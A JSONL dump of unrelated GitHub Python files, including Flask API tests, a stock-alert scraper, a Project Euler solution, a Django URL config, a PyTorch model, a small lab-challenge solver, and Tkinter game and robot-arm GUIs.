content_type='application/json')\n self.assertEqual(response.status_code, 201)\n\n def test_todo_get_all(self):\n response = self.app.get(BASE_URL)\n data = json.loads(response.get_data())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(data['todos']), 2)\n\n def test_todo_get_one(self):\n response = self.app.get(GET_URL)\n data = json.loads(response.get_data())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(data['todo']['title'], 'Finish Api')\n\n def test_todo_update(self):\n todo = {\n 'title': u'Finish Learning',\n 'description': u'Finish this api and submit',\n 'done': False\n }\n response = self.app.put(UPDATE_URL,\n data=json.dumps(todo),\n content_type='application/json')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.get_data())\n self.assertEqual(data['todo']['title'],'Finish Learning')\n\n def test_todo_delete(self):\n response = self.app.delete(DELETE_URL)\n self.assertEqual(response.status_code, 204)\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"Denniskamau/Todo-API","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14023871738","text":"# This is a sample Python script.\nimport json\nimport time\n\nimport requests\nimport schedule\nfrom loguru import logger\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom config import settings\n\nPUSHOVER_API: str = 'https://api.pushover.net/1/messages.json'\nin_stock: bool = False\n\n\ndef check_stock(url: str):\n logger.info(\"checking stock for {item}\", item=item_name(url))\n options = Options()\n options.add_argument('--headless')\n\n # needed for docker, since chrome doesn't like being run as root\n options.add_argument('--no-sandbox')\n options.add_argument('--disable-dev-shm-usage')\n\n browser = webdriver.WebDriver(service=Service(ChromeDriverManager().install()), options=options)\n browser.get(url)\n\n global in_stock\n in_stock = browser.find_element(By.ID, 'AddToCartText-product-template').text != 'SOLD OUT'\n if in_stock:\n logger.info(\"{item} is in stock\", 
item=item_name(url))\n        notify(url)\n\n\ndef notify(url: str):\n    data: dict[str, str | int] = {\n        'token': settings.PUSHOVER_API_TOKEN,\n        'user': settings.PUSHOVER_USER_TOKEN,\n        'title': 'JK9 IN STOCK!',\n        'url': url,\n        'message': item_name(url) + ' is in stock',\n        'priority': '2',\n        'expire': 10800, # seconds\n        'retry': 30 # seconds\n    }\n    headers: dict[str, str] = {'Content-type': 'application/json', 'Accept': 'application/json'}\n\n    requests.post(PUSHOVER_API, data=json.dumps(data), headers=headers)\n    logger.info(\"pushover alert sent for {item}\", item=item_name(url))\n\n\ndef item_name(url: str):\n    return url.rsplit('/', 1)[1]\n\n\ndef main():\n    logger.debug('app startup')\n    schedule.every(1).to(5).minutes.do(\n        check_stock,\n        'https://usa.juliusk9.com/collections/bite-pad/products/julius-k9-cotton-nylon-soft-bite-pad'\n    )\n    while not in_stock:\n        schedule.run_pending()\n        time.sleep(1)\n\n\nmain()\n","repo_name":"hollanbm/JK9-stock-alerts","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"25985384536","text":"## The code might take a while.\r\n\r\nfrom number_theory import sum_factor\r\n\r\nproper_factor = lambda x: sum_factor(x)-x\r\n\r\nlimit = 28123\r\n\r\nabundant = []\r\nfor i in range(limit+2):\r\n    if proper_factor(i+1) > (i+1):\r\n        abundant.append(i+1)\r\n\r\n#print(abundant) ## abundant is still sorted at this point\r\n\r\nsum_abundant = {}\r\n\r\nfor j in range(len(abundant)):\r\n    for k in range(j,len(abundant)):\r\n        test = abundant[j]+abundant[k]\r\n        if test <= limit:\r\n            sum_abundant[test] = sum_abundant.get(test,0)+1\r\nsum_abundant = sorted(list(sum_abundant.keys()))\r\n\r\n#print(sum_abundant) ## list of numbers that can be expressed as sum of 2 AN\r\n\r\n# every integer above 28123 can be written as the sum of two abundant numbers; the long number below is the sum of all integers from 1 to 28123, inclusive\r\nans = 395465626 - sum(sum_abundant)\r\nprint(ans)","repo_name":"RussellDash332/Project-Euler","sub_path":"pe-023.py","file_name":"pe-023.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"}
+{"seq_id":"10042658291","text":"from tkinter import *\nimport os\n\n\nroot = Tk()\ndef oneVone():\n    #exec('xo2buttonbind')\n    root.destroy()\n    os.system('python xo2buttonbind.py')\n\n\n\ndef computer():\n    #exec('tictactoe')\n    root.destroy()\n    os.system('python tictactoe.py')\n    #tictactoe.GUI().mainloop()\n\n\nlabel = Label(root, text=\"Hello! 
Select game mode:\", height=2, font=\"arial 16\")\nlabel.pack()\nbutton1 = Button(root, text=\"1V1\", width=14, font=\"arial 12\", command= oneVone)\nbutton1.pack()\nbutton2 = Button(root, text=\"Against computer\", width=14, font=\"arial 12\", command= computer)\nbutton2.pack()\nroot.mainloop()\n","repo_name":"DaniiarR/Tic-Tac-Toe-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22704768052","text":"from django.urls import path\nfrom .views import (\n api_categories,\n api_conditional_items,\n api_items,\n api_condition,\n api_conditions,\n api_category,\n api_item,\n api_packing_lists,\n api_packing_list_items,\n api_packing_list,\n)\n\nurlpatterns = [\n path(\"categories\", api_categories, name=\"api_categories\"),\n path(\"categories//\", api_category, name=\"api_category\"),\n path(\"items\", api_items, name=\"api_items\"),\n path(\"items//\", api_item, name=\"api_item\"),\n path(\n \"items/conditions//\",\n api_conditional_items,\n name=\"api_conditional_items\",\n ),\n path(\"conditions\", api_conditions, name=\"api_conditions\"),\n path(\"conditions//\", api_condition, name=\"api_condition\"),\n path(\"packing_lists/\", api_packing_lists, name=\"api_packing_lists\"),\n path(\"packing_lists//\", api_packing_list, name=\"api_packing_list\"),\n path(\n \"packing_lists//items/\",\n api_packing_list_items,\n name=\"api_packing_list_items\",\n ),\n]\n","repo_name":"William-pdf/Packed","sub_path":"packing-lists/packed_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18927919362","text":"# coding=utf-8\n\n'''\n\n\n \n \n \n \n \n
    \n 请在2秒内口算结果并提交!
    \n 6630*11586+1309*(6630+11586)=\n \n
    \n \n\n\n'''\n\nimport requests\nimport re\n# get the page\ns = requests.Session()\nurl = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'\nreq = s.get(url)\nprint(req.content)\n\n# get the equation\nnum = re.findall(r'
\\s+(.*?)=', req.content)[0]\nprint(\"Please calculate: \"+num)\n\n# calc the result and post\npost1 = {'v': eval(num)}\nreq1 = s.post(url, data=post1)\nprint(req1.content)\n\n\n\n","repo_name":"savior325/ctf_scripts","sub_path":"web/web快速计算.py","file_name":"web快速计算.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"}
+{"seq_id":"5321025202","text":"import pickle\nimport hashlib\nimport os\nimport time\nfrom typing import List, Any, Optional\nfrom dataclasses import dataclass, field, asdict\n\nimport corplib\nfrom conclib.calc import require_existing_conc\nfrom corplib.errors import MissingSubCorpFreqFile\nfrom bgcalc import freq_calc\nimport settings\nfrom bgcalc.errors import UnfinishedConcordanceError\nfrom translation import ugettext as _\nimport bgcalc\n\nTASK_TIME_LIMIT = settings.get_int('calc_backend', 'task_time_limit', 300)\n\n\n@dataclass\nclass CollCalcArgs:\n    \"\"\"\n    Collects all the required arguments passed around when\n    calculating collocation profiles.\n    \"\"\"\n    q: List[str]\n    user_id: int\n    corpname: str\n    corpus_encoding: str\n    collpage: int\n    citemsperpage: int\n    save: bool\n    cattr: str\n    csortfn: str\n    cbgrfns: str\n    cfromw: int\n    ctow: int\n    cminbgr: int\n    cminfreq: int\n    subcname: Optional[str]\n    subcpath: List[str] = field(default_factory=list)\n    cache_path: Optional[str] = field(default=None)\n    samplesize: int = field(default=0)\n\n\nclass CollCalcCache(object):\n\n    def __init__(self, corpname, subcname, subcpath, user_id, q, save=0, samplesize=0):\n        self._corpname = corpname\n        self._subcname = subcname\n        self._subcpath = subcpath\n        self._user_id = user_id\n        self._q = q\n        self._save = save\n        self._samplesize = samplesize\n\n    def _cache_file_path(self, cattr, csortfn, cbgrfns, cfromw, ctow, cminbgr, cminfreq):\n        v = f'{self._corpname}{self._subcname}{self._user_id}{\"\".join(self._q)}{cattr}{csortfn}{cbgrfns}{cfromw}{ctow}{cminbgr}{cminbgr}{cminfreq}'\n        filename = f'{hashlib.sha1(v.encode(\"utf-8\")).hexdigest()}.pkl'\n        return os.path.join(settings.get('corpora', 'colls_cache_dir'), filename)\n\n    def get(self, cattr, csortfn, cbgrfns, cfromw, ctow, cminbgr, cminfreq):\n        \"\"\"\n        Get value from cache.\n\n        returns:\n        a 2-tuple (cached_data, cache_path) where cached_data is None in case of cache miss\n        \"\"\"\n        cache_path = self._cache_file_path(cattr=cattr, csortfn=csortfn, cbgrfns=cbgrfns, cfromw=cfromw, ctow=ctow,\n                                           cminbgr=cminbgr, cminfreq=cminfreq)\n        if os.path.isfile(cache_path):\n            with open(cache_path, 'rb') as f:\n                collocs = pickle.load(f)\n        else:\n            collocs = None\n        return collocs, cache_path\n\n\n# TODO !!!! FIX (missing user-id, deprecated handling of MissingSubCorpFreqFile\ndef calculate_colls_bg(coll_args: CollCalcArgs):\n    \"\"\"\n    Background collocations calculation running on a worker server.\n    In case auxiliary data files are needed and not present already\n    (MissingSubCorpFreqFile exception), the function triggers\n    a respective calculation.\n    \"\"\"\n    cm = corplib.CorpusManager(subcpath=coll_args.subcpath)\n    corp = cm.get_corpus(coll_args.corpname, subcname=coll_args.subcname)\n    try:\n        # try to fetch precalculated data; if none then MissingSubCorpFreqFile\n        corplib.frq_db(corp, coll_args.cattr)\n        conc = require_existing_conc(corp=corp, q=coll_args.q)\n        if not conc.finished():\n            raise UnfinishedConcordanceError(\n                _('Cannot calculate yet - source concordance not finished. 
Please try again later.'))\n collocs = conc.collocs(cattr=coll_args.cattr, csortfn=coll_args.csortfn, cbgrfns=coll_args.cbgrfns,\n cfromw=coll_args.cfromw, ctow=coll_args.ctow, cminfreq=coll_args.cminfreq,\n cminbgr=coll_args.cminbgr, max_lines=conc.size())\n for item in collocs['Items']:\n item['pfilter'] = [('q2', item['pfilter'])]\n item['nfilter'] = [('q2', item['nfilter'])]\n return dict(data=collocs, processing=0, tasks=[])\n except MissingSubCorpFreqFile:\n ans = {'attrname': coll_args.cattr, 'tasks': []}\n out = freq_calc.build_arf_db(corp, coll_args.cattr)\n if type(out) is list:\n processing = 1\n ans['tasks'].extend(out)\n else:\n processing = 0\n ans['processing'] = processing\n ans['data'] = dict(Items=[], Head=[])\n return ans\n\n\n@dataclass\nclass CalculateCollsResult:\n Head: str\n attrname: str\n processing: bool\n lastpage: bool\n Items: List[Any]\n\n\ndef calculate_colls(coll_args: CollCalcArgs) -> CalculateCollsResult:\n \"\"\"\n Calculates required collocations based on passed arguments.\n Result values are cached.\n\n returns:\n a dictionary ready to be used in a respective template (collx.tmpl)\n (keys: Head, Items, cmaxitems, attrname, processing, collstart, lastpage)\n \"\"\"\n collstart = (coll_args.collpage - 1) * coll_args.citemsperpage\n collend = collstart + coll_args.citemsperpage\n cache = CollCalcCache(corpname=coll_args.corpname, subcname=coll_args.subcname, subcpath=coll_args.subcpath,\n user_id=coll_args.user_id, q=coll_args.q, save=coll_args.save,\n samplesize=coll_args.samplesize)\n collocs, cache_path = cache.get(cattr=coll_args.cattr, csortfn=coll_args.csortfn, cbgrfns=coll_args.cbgrfns,\n cfromw=coll_args.cfromw, ctow=coll_args.ctow, cminbgr=coll_args.cminbgr,\n cminfreq=coll_args.cminfreq)\n if collocs is None:\n coll_args.cache_path = cache_path\n app = bgcalc.calc_backend_client(settings)\n res = app.send_task('calculate_colls', args=(coll_args,), time_limit=TASK_TIME_LIMIT)\n # worker task caches the value AFTER the result is returned (see worker.py)\n ans = res.get()\n else:\n ans = dict(data=collocs, processing=0)\n return CalculateCollsResult(\n Head=ans['data']['Head'],\n attrname=coll_args.cattr,\n processing=ans['processing'],\n lastpage=not collstart + coll_args.citemsperpage < len(ans['data']['Items']),\n Items=ans['data']['Items'][collstart:collend]\n )\n\n\ndef clean_colls_cache():\n root_dir = settings.get('corpora', 'colls_cache_dir')\n cache_ttl = settings.get_int('corpora', 'colls_cache_ttl', 3600)\n test_time = time.time()\n all_files = os.listdir(root_dir)\n num_removed = 0\n num_error = 0\n for item in all_files:\n file_path = os.path.join(root_dir, item)\n if test_time - os.path.getmtime(file_path) >= cache_ttl:\n try:\n os.unlink(file_path)\n num_removed += 1\n except OSError:\n num_error += 1\n return dict(total_files=len(all_files), num_removed=num_removed, num_error=num_error)\n","repo_name":"clarinsi/kontext","sub_path":"lib/bgcalc/coll_calc.py","file_name":"coll_calc.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"36603024435","text":"\"\"\"balance table\n\nRevision ID: fc8cb5f0f910\nRevises: c8e0aa159e60\nCreate Date: 2020-03-23 16:51:54.167968\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"fc8cb5f0f910\"\ndown_revision = \"c8e0aa159e60\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please 
adjust! ###\n op.create_index(op.f(\"ix_balance_balance\"), \"balance\", [\"balance\"], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f(\"ix_balance_balance\"), table_name=\"balance\")\n # ### end Alembic commands ###\n","repo_name":"alexisleveratto/Audit-on-Blockchain","sub_path":"migrations/versions/fc8cb5f0f910_balance_table.py","file_name":"fc8cb5f0f910_balance_table.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7676760329","text":"import sys\nimport subprocess\nimport torch.nn as nn\nimport torch.nn.functional as F\ntry:\n from torchsummary import summary\nexcept ImportError:\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", 'torchsummary'])\nfinally:\n from torchsummary import summary\n\n\nclass QuizDNN(nn.Module):\n def __init__(self):\n super(QuizDNN, self).__init__()\n\n self.x1 = nn.Sequential(\n nn.Conv2d(3, 64, 3, bias=False, padding=1), # i/p - 32x32\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x2 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 32x32\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x3 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 32x32\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x4 = nn.Sequential(\n nn.MaxPool2d(2, 2), # i/p - 16x16\n )\n\n self.x5 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 16x16\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x6 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 16x16\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x7 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 16x16\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x8 = nn.Sequential(\n nn.MaxPool2d(2, 2), # RF - 8x8\n )\n\n self.x9 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 8x8\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x10 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 8x8\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x11 = nn.Sequential(\n nn.Conv2d(64, 64, 3, bias=False, padding=1), # i/p - 8x8\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n\n self.x12 = nn.Sequential(\n nn.AdaptiveAvgPool2d(1)\n )\n\n self.x13 = nn.Sequential(\n nn.Linear(64, 10)\n )\n\n def forward(self, x):\n\n x1 = self.x1(x)\n x2 = self.x2(x1)\n x3 = self.x3(x1 + x2)\n x4 = self.x4(x1 + x2 + x3)\n\n x5 = self.x5(x4)\n x6 = self.x6(x4 + x5)\n x7 = self.x7(x4 + x5 + x6)\n x8 = self.x8(x5 + x6 + x7)\n\n x9 = self.x9(x8)\n x10 = self.x10(x8 + x9)\n x11 = self.x11(x8 + x9 + x10)\n\n x12 = self.x12(x11)\n x12 = x12.view(-1, 64)\n\n out = self.x13(x12)\n\n return F.log_softmax(out)\n\n\ndef model_summary(model, input_size):\n print(summary(model, input_size=input_size))\n","repo_name":"namanphy/EVA5","sub_path":"S9/model/QuizDNN.py","file_name":"QuizDNN.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40608084652","text":"import basic_model as bm\nimport data_process_model as dpm\nimport numpy as np\nimport tensorflow as tf\n\n#reshape the dataset for Link_CNN\n#ver 1.0\ndef reshape_dataset(dataset, SPAN):\n input_data = np.zeros((dataset.shape[0], 32, 104, 2))\n temp_data = np.reshape(dataset[:, :6200], (-1, 31, 100, 2))\n input_data[:, :31, 2:102, 0] = temp_data[:, :, :, 0] # cause 
input size is 32 not 31\n    input_data[:, :31, 2:102, 1] = temp_data[:, :, :, 1]\n    para_data = dataset[:, 6200:6241]\n\n    output_data = dataset[:, 6240 + SPAN[0]].astype(int)\n    output_data = dpm.num_to_one_hot(output_data, 3)\n\n    return input_data, para_data, output_data\n\n# get the y_pred\ndef inference(input_layer, para_data, train_phase, keep_prob):\n    with tf.variable_scope(\"inference\"):\n        parameters = []\n        # input (N,32,104,2)\n        bn_input = bm.batch_norm_layer(input_layer, train_phase, \"bn_input\")\n\n        # conv1 (N,16,52,64)\n        conv1, filter1 = bm.conv_bn_pool_layer(bn_input, 64, train_phase, \"conv1\")\n        parameters[0:0] = filter1\n\n        # conv2 (N,8,26,128)\n        conv2, filter2 = bm.conv_bn_pool_layer(conv1, 128, train_phase, \"conv2\")\n        parameters[0:0] = filter2\n\n        # conv3 (N, 4, 13, 256)\n        conv3, filter3 = bm.conv_bn_pool_layer(conv2, 256, train_phase, \"conv3\")\n        parameters[0:0] = filter3\n\n        # flat\n        flat_conv3 = tf.reshape(conv3, [-1, 4 * 13 * 256])\n\n        # fc layer1(N, 512)\n        fc1, fc_weight1 = bm.fc_bn_drop_layer(flat_conv3, 512, train_phase, keep_prob, \"fc1\")\n        parameters[0:0] = fc_weight1\n\n        #link the para_data\n        fc1_link = tf.concat([fc1, para_data], axis=1)\n\n        #fc layer2(N,256)\n        fc2, fc_weight2 = bm.fc_bn_drop_layer(fc1_link, 256, train_phase, keep_prob, \"fc2\")\n        parameters[0:0] = fc_weight2\n\n        # score layer\n        y_pred, score_weight = bm.score_layer(fc2, 3)\n        parameters[0:0] = score_weight\n\n        return y_pred, parameters\n\n\n","repo_name":"Freshield/LEARN_TENSORFLOW","sub_path":"20_Project/19_ciena_20spans_data/Link_CNN_model.py","file_name":"Link_CNN_model.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"23338688239","text":"import tkinter as tk\nimport tkinter.font as tkFont\nfrom tkinter import messagebox\nfrom PIL import Image, ImageTk\n\n\ndef tkimg_resized(img, w_box, h_box, keep_ratio=True):\n\t\"\"\"Scale an image proportionally so that it fits inside the given box.\"\"\"\n\tw, h = img.size\n\n\tif keep_ratio:\n\t\tif w > 
window.geometry(\"700x400\") # 窗体尺寸设置\n window.iconbitmap(\"Money.ico\") # 窗体左上角图标设置\n window.title(\"机械臂抓取控制界面\")\n window.resizable(True, True) # 设置窗体不可改变大小\n\n #背景图选择并放置\n img=ImageTk.PhotoImage(file=\"bg1.png\")\n canvas = tk.Canvas(window, width=1000, height=800)\n canvas.create_image(300, 200, image=img)\n canvas.pack(expand=tk.YES, fill=tk.BOTH)\n\n def show_title(self): #窗口边框消失、复原函数\n global a\n a=not a\n window.overrideredirect(a)\n def close(self): #窗口退出函数\n if show_confirm(\"确认退出吗 ?\"):\n window.quit()\n\n\n #**************************标题设置开始处*****************************\n f1 = tk.Frame(canvas)\n #图像按钮 1\n im1 = image_label(f1, \"laugh.jpg\", 86, 86, False)\n im1.configure(bg=\"Teal\")\n im1.bind('',show_title)\n im1.pack(side=tk.LEFT, anchor=tk.NW, fill=tk.Y)\n #标题背景、字体......\n ft1 = tkFont.Font(family=\"微软雅黑\", size=24, weight=tkFont.BOLD)\n tk.Label(f1, text=\"欢迎来到机械臂控制界面\", height=2, fg=\"white\", font=ft1, bg=\"Teal\") \\\n .pack(side=tk.LEFT, expand=tk.YES, fill=tk.X)\n #图像按钮 2\n im2 = image_label(f1, \"close.png\", 86, 86, False)\n im2.configure(bg=\"Teal\")\n im2.bind('',close)\n im2.pack(side=tk.RIGHT, anchor=tk.NW, fill=tk.Y)\n\n f1.pack(fill=tk.X)\n #**************************标题设置结束*****************************\n\n# ---------------------------------------------------------------------\n# 两个功能按钮组的设置\n# ---------------------------------------------------------------------\n\n # ‘手动抓取’和‘自动抓取’功能按钮所调用的函数\n def shou_dong():\n Wd_1()\n def zi_dong():\n Wd_2()\n # 子窗口一\n def Wd_1():\n Wd=tk.Toplevel()\n Wd.geometry(\"%dx%d\" % (800,620)) # 窗体尺寸\n Wd.title(\"手动抓取界面\") # 窗体标题\n Wd.grab_set()\n Wd.resizable(True, True)\n\n frame = tk.Frame(Wd, height=20,bg=\"Goldenrod\")\n ft0 = tkFont.Font(family=\"微软雅黑\", size=18, weight=tkFont.BOLD)\n tk.Label(frame, font=ft0, bg=\"Chocolate\", fg=\"white\", text=\"请手动调控机械臂的各个舵机参数\") \\\n .pack(padx=20)\n frame.pack(fill=tk.X)\n\n ft1 = tkFont.Font(family=\"微软雅黑\", size=12, weight=tkFont.BOLD)\n ft2 = tkFont.Font(family=\"微软雅黑\", size=14, weight=tkFont.BOLD)\n\n #右边绿框(画布形式)\n canvas = tk.Canvas(frame, bg='green', height=238, width=450)\n # 定义多边形参数,然后在画布上画出指定图形\n x0, y0, x1, y1 = 100, 100, 150, 150\n line = canvas.create_line(x0 - 50, y0 - 50, x1 - 50, y1 - 50) # 画直线\n oval = canvas.create_oval(x0 + 120, y0 + 50, x1 + 120, y1 + 50, fill='yellow') # 画圆 用黄色填充\n arc = canvas.create_arc(50, 150, 100, 200, start=0, extent=180,fill='red') # 画扇形 从0度打开收到180度结束\n rect = canvas.create_rectangle(330, 30, 330 + 20, 30 + 20,fill='blue') # 画矩形正方形\n triangle = canvas.create_polygon(208,135,222,43,268,95,fill='DeepPink')\n\n canvas.pack(side=tk.RIGHT,anchor=tk.N)\n\n\n #舵机一框区\n v_1 = tk.StringVar()\n v_2 = tk.StringVar()\n v_3 = tk.StringVar()\n v_4 = tk.StringVar()\n v_5 = tk.StringVar()\n v_6 = tk.StringVar()\n\n f_dj1 = tk.Frame(frame)\n tk.Label(f_dj1, font=ft2, text=\"一号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj1.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj1 = tk.Spinbox(f_dj1, from_=0, to=300, width=19,textvariable=v_1, font=ft1)\n p_dj1.pack(side=tk.LEFT, padx=10)\n # 舵机二框区\n f_dj2 = tk.Frame(frame)\n tk.Label(f_dj2, font=ft2, text=\"二号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj2.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj2 = tk.Spinbox(f_dj2, from_=0, to=300, width=19,textvariable=v_2, font=ft1)\n p_dj2.pack(side=tk.LEFT, padx=10)\n # 舵机三框区\n f_dj3 = tk.Frame(frame)\n tk.Label(f_dj3, font=ft2, text=\"三号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj3.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj3 = tk.Spinbox(f_dj3, from_=0, 
to=300, width=19,textvariable=v_3, font=ft1)\n p_dj3.pack(side=tk.LEFT, padx=10)\n # 舵机四框区\n f_dj4 = tk.Frame(frame)\n tk.Label(f_dj4, font=ft2, text=\"四号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj4.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj4 = tk.Spinbox(f_dj4, from_=0, to=300, width=19,textvariable=v_4, font=ft1)\n p_dj4.pack(side=tk.LEFT, padx=10)\n # 舵机五框区\n f_dj5 = tk.Frame(frame)\n tk.Label(f_dj5, font=ft2, text=\"五号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj5.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj5 = tk.Spinbox(f_dj5, from_=0, to=300, width=19,textvariable=v_5, font=ft1)\n p_dj5.pack(side=tk.LEFT, padx=10)\n # 舵机六框区\n f_dj6 = tk.Frame(frame)\n tk.Label(f_dj6, font=ft2, text=\"六号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj6.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj6 = tk.Spinbox(f_dj6, from_=0, to=300, width=19,textvariable=v_6, font=ft1)\n p_dj6.pack(side=tk.LEFT, padx=10)\n\n\n #---------------------------彩虹边框------------------------------------\n tk.Frame(Wd, width=25, bg=\"OrangeRed\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=25, bg=\"OrangeRed\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=25, bg=\"OrangeRed\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=25, bg=\"OrangeRed\").pack(side=tk.RIGHT, fill=tk.Y)\n\n tk.Frame(Wd, width=25, bg=\"Orange\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=25, bg=\"Orange\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=25, bg=\"Orange\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=25, bg=\"Orange\").pack(side=tk.RIGHT, fill=tk.Y)\n\n tk.Frame(Wd, width=25, bg=\"Gold\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=25, bg=\"Gold\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=25, bg=\"Gold\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=25, bg=\"Gold\").pack(side=tk.RIGHT, fill=tk.Y)\n\n tk.Frame(Wd, width=25, bg=\"Yellow\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=25, bg=\"Yellow\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=25, bg=\"Yellow\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=25, bg=\"Yellow\").pack(side=tk.RIGHT, fill=tk.Y)\n\n tk.Frame(Wd, width=25, bg=\"GreenYellow\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=25,bg=\"GreenYellow\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=25, bg=\"GreenYellow\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=25, bg=\"GreenYellow\").pack(side=tk.RIGHT, fill=tk.Y)\n\n tk.Frame(Wd, width=65, bg=\"Cyan\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=20, bg=\"Cyan\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=20, bg=\"Cyan\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=65, bg=\"Cyan\").pack(side=tk.RIGHT, fill=tk.Y)\n #-------------------------------------------------------------------------\n\n Bt=tk.Canvas(Wd,bg=\"Cyan\")\n Bt.pack(side=tk.TOP, padx=0, pady=0)\n def reset():\n v_1.set(\"0\")\n v_2.set(\"0\")\n v_3.set(\"0\")\n v_4.set(\"0\")\n v_5.set(\"0\")\n v_6.set(\"0\")\n\n tk.Button(Bt,text='复位', width=15, height=1, bg=\"MediumPurple\", font=ft2,command=reset)\\\n .pack(padx=10,anchor=tk.W,side=tk.LEFT)\n tk.Button(Bt, text='应用', width=15, height=1, bg=\"MediumPurple\", font=ft2, command=reset) \\\n .pack(padx=10, anchor=tk.W, side=tk.RIGHT)\n\n\n def Wd_2():\n Wd = tk.Toplevel()\n Wd.geometry(\"%dx%d\" % (800, 620)) # 窗体尺寸\n Wd.title(\"手动抓取界面\") # 窗体标题\n Wd.grab_set()\n Wd.resizable(True, True)\n\n frame = tk.Frame(Wd, height=20, bg=\"Bisque\")\n ft0 = tkFont.Font(family=\"微软雅黑\", size=18, 
